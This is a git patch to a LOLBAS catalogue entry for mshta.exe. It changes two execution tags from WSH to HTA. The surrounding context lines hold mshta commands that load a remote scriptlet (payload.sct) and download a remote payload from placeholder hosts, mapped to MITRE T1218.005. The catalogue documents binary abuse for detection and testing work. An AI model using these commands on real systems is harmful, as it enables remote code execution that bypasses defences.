From c34810b29b1e9f787bcf0baf84da51c0d2e8aa22 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 18:08:27 +0200
Subject: [PATCH] Update Mshta.yml Tags

Changed Execute: WSH to HTA
---
 yml/OSBinaries/Mshta.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml
index 355b547..eb8167d 100644
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@@ -12,7 +12,7 @@ Commands:
     MitreID: T1218.005
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
-      - Execute: WSH
+      - Execute: HTA
       - Execute: Remote
   - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
     Description: Executes VBScript supplied as a command line argument.
@@ -40,7 +40,7 @@ Commands:
     MitreID: T1218.005
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
     Tags:
-      - Execute: WSH
+      - Execute: HTA
   - Command: mshta.exe https://example.com/payload
     Description: It will download a remote payload and place it in INetCache.
     Usecase: Downloads payload from remote server